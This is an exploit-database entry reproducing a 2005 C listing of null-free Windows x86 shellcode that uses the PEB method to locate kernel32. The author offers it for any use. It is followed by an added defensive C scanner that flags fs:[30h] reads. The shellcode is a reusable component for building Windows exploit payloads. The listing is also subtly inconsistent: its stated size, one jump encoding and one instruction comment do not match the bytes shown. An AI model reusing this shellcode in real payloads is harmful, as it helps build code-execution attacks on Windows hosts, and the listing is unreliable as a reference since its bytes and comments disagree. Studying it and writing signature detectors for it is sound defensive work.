Windows (9x/NT/2000/XP) – PEB Method Shellcode (35 bytes)

Vulnerability ID: 1054856
Vulnerability type: (not given)
Published: 2005-01-09    Updated: 2005-01-09
CVE ID: N/A
CNNVD ID: N/A
Platform: Windows_x86    CVSS score: N/A

Source:
https://www.exploit-db.com/exploits/13527

Details:
Vulnerability details have not been disclosed.

Exploit:
/* This is a 35 byte C implementation of the use of the PEB method to get
 * the kernel32 base address on Windows. This is generic code designed to
 * run on both Windows 9x and NT based systems. The code has been optimized
 * to not have any 00h bytes so that you won't have to use an XOR routine to
 * encode the shellcode. I used relative jumps and xor tricks to avoid the
 * 00h bytes and make the code as small as I could get it. Feel free to use
 * this source in anything that you want.
 */


/* 35 byte PEB method for Windows 9x/NT/2k/XP
*  0x00 byte optimized, no XOR routine required.
*
*  www.4x10m.com
*  oc.192
*  irc.4x10m.net #4x10m
*/

#include <stdio.h>

unsigned char shellcode[] =
/*  35 byte PEB - 00h removal and size optimized  */
/*      22 - 24 total clock cycles on a x486      */
"\x31\xC0"                  /* xor eax, eax       */
"\x31\xD2"                  /* xor edx, edx       */
"\xB2\x30"                  /* mov dl, 30h        */
"\x64\x8B\x02"              /* mov eax, [fs:edx]  */      /* PEB base address */
"\x85\xC0"                  /* test eax, eax      */
"\x78\xC0"                  /* js 0Ch             */
"\x8B\x40\x0C"              /* mov eax, [eax+0Ch] */      /* NT kernel32 routine */
"\x8B\x70\x1C"              /* mov esi, [eax+1Ch] */
"\xAD"                      /* lodsd              */
"\x8B\x40\x08"              /* mov eax, [eax+08h] */
"\xEB\x07"                  /* jmp short 09h      */
"\x8B\x40\x34"              /* mov eax, [eax+34h] */      /* 9x kernel32 routine */
"\x8D\x40\x7C"              /* lea eax, [eax+7Ch] */
"\x8D\x40\x3C"              /* mov eax, [eax+3Ch] */
;

int main(int argc, char *argv[]) {
      /* Execution of the buffer is left commented out; the program only
       * reports the size (34 code bytes plus the string's terminating NUL). */
      //void (*sc)() = (void *)shellcode;
      printf("len:%d\n", (int)sizeof(shellcode));
      //sc();
      return 0;
}

// milw0rm.com [2005-01-09]
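The listing above starts, like most PEB-method stubs, with a read of fs:[30h] (the PEB pointer). A simple way to use that fact defensively is a byte-signature scanner that flags the two usual x86 encodings of that read, the direct `mov eax, fs:[30h]` and the null-free `mov dl, 30h; mov eax, [fs:edx]` form used here, and that also counts 0x00 bytes, which the author claims the stub avoids. The following C program is an added example written for this page, not part of the exploit-db entry; the sample buffer is a constructed copy of the 34 code bytes shown above, and the pattern names and functions are this example's own.

```c
/* Added example: signature scan for fs:[30h] (PEB pointer) reads in a byte
 * buffer, plus a null-byte count. Not part of the original listing. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Direct form: mov eax, fs:[30h] -> 64 A1 30 00 00 00 (contains nulls) */
static const unsigned char PAT_DIRECT[] = {0x64, 0xA1, 0x30, 0x00, 0x00, 0x00};

/* Null-free form used by the listing above:
 *   mov dl, 30h ; mov eax, [fs:edx] -> B2 30 64 8B 02 */
static const unsigned char PAT_INDIRECT[] = {0xB2, 0x30, 0x64, 0x8B, 0x02};

/* Returns the offset of the first fs:[30h] read found in buf, or -1. */
long find_peb_read(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++) {
        if (len - i >= sizeof PAT_DIRECT &&
            memcmp(buf + i, PAT_DIRECT, sizeof PAT_DIRECT) == 0)
            return (long)i;
        if (len - i >= sizeof PAT_INDIRECT &&
            memcmp(buf + i, PAT_INDIRECT, sizeof PAT_INDIRECT) == 0)
            return (long)i;
    }
    return -1;
}

/* Counts 0x00 bytes; a "00h-free" stub should yield 0 over its code bytes. */
size_t count_nulls(const unsigned char *buf, size_t len) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            n++;
    return n;
}

/* Constructed copy of the 34 code bytes from the listing above
 * (the C string's terminating NUL is deliberately excluded). */
static const unsigned char sample[] = {
    0x31, 0xC0,             /* xor eax, eax        */
    0x31, 0xD2,             /* xor edx, edx        */
    0xB2, 0x30,             /* mov dl, 30h         */
    0x64, 0x8B, 0x02,       /* mov eax, [fs:edx]   */
    0x85, 0xC0,             /* test eax, eax       */
    0x78, 0xC0,             /* js ...              */
    0x8B, 0x40, 0x0C,       /* mov eax, [eax+0Ch]  */
    0x8B, 0x70, 0x1C,       /* mov esi, [eax+1Ch]  */
    0xAD,                   /* lodsd               */
    0x8B, 0x40, 0x08,       /* mov eax, [eax+08h]  */
    0xEB, 0x07,             /* jmp short ...       */
    0x8B, 0x40, 0x34,       /* mov eax, [eax+34h]  */
    0x8D, 0x40, 0x7C,       /* lea eax, [eax+7Ch]  */
    0x8D, 0x40, 0x3C        /* lea eax, [eax+3Ch]  */
};

/* Convenience wrapper: scan the embedded sample and return the hit offset. */
long scan_sample(void) {
    return find_peb_read(sample, sizeof sample);
}

int main(void) {
    long off = scan_sample();
    if (off >= 0)
        printf("fs:[30h] read at offset %ld, %zu null bytes in %zu code bytes\n",
               off, count_nulls(sample, sizeof sample), sizeof sample);
    else
        printf("no fs:[30h] read found\n");
    return 0;
}
```

The indirect pattern is matched as a five-byte unit so that an isolated `mov dl, 30h` does not fire on its own; a production scanner would also need to handle the other register choices and prefix orderings that assemble to the same read.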
